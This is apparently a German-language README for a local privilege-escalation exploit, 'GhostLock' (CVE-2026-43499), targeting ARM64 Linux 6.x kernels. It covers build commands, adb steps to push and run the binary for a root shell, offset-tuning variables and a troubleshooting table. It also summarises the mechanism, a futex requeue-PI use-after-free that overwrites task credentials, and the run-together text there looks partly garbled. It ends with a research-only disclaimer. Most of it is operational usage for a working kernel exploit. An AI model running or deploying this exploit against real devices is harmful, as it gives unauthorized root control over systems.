
GhostLock (CVE-2026-43499) Anpassung für Nicht-Android-Linux 6.x ARM64
Ein Privilege-Escalation-Exploit für GhostLock (CVE-2026-43499), der auf Nicht-Android-Linux-6.x-ARM64-Kernel abzielt.
| Eigenschaft | Wert |
|---|---|
| Architektur | ARM64 (AArch64) |
| VA_BITS | 39 |
| KIMAGE_TEXT_BASE | 0xffffffc008000000 |
| Kernel-Version | 6.x |
| SELinux | Nicht vorhanden |
| ashmem | Nicht vorhanden |
| configfs | Nicht vorhanden |
make
make android-arm64 NDK=/path/to/android-ndk
Nach dem Push wird die Kompilierung automatisch ausgelöst; lade einfach das Artifact herunter.
# Auf das Zielgerät übertragen
adb push ghostlock-arm64 /data/local/tmp/e
adb shell chmod 755 /data/local/tmp/e
# Root-Shell erhalten
adb shell /data/local/tmp/e --shell
# pselect-Offset anpassen (falls der Standardwert nicht funktioniert)
adb shell PSELECT_SHIFT=-4 /data/local/tmp/e --shell
adb shell PSELECT_SHIFT=-2 /data/local/tmp/e --shell
adb shell PSELECT_SHIFT=0 /data/local/tmp/e --shell
adb shell PSELECT_SHIFT=2 /data/local/tmp/e --shell
adb shell PSELECT_SHIFT=4 /data/local/tmp/e --shell
# Physikalische Ladeadresse angeben
adb shell KPHYS=0x80000000 /data/local/tmp/e --shell
| Variable | Standardwert | Beschreibung |
|---|---|---|
PSELECT_SHIFT | -2 | Offset-Anpassung des pselect-Waiters auf dem Stack |
KPHYS | 0x80000000 | Physikalische Ladeadresse des Kernels |
KIMAGE_TEXT_BASE | 0xffffffc008000000 | Virtuelle Basisadresse des Kernels |
FUTEX_CMP_REQUEUE_PI löst eine UAF in remove_waiter() ausrt_mutex_waiter landet im stack_fds-Puffertask_struct->cred wird mit init_cred überschriebenDiese Version basiert auf ghostlock-oneplus und wurde verschlankt:
| Symptom | Mögliche Ursache | Lösung |
|---|---|---|
| Gerät startet neu | PSELECT_SHIFT falsch | Nacheinander von -4 bis +4 ausprobieren |
| Keine Wirkung | KPHYS falsch | Richtigen Wert in /proc/iomem prüfen |
| perf_event_open failed | seccomp-Einschränkung | Versuch, es über die ADB-Shell auszuführen |
| Kein Root | Offset stimmt nicht überein | Kernel-Version bestätigen, TASK_CRED_OFF prüfen |
Dieses Tool dient ausschließlich der Sicherheitsforschung. Der Nutzer trägt die alleinige Verantwortung.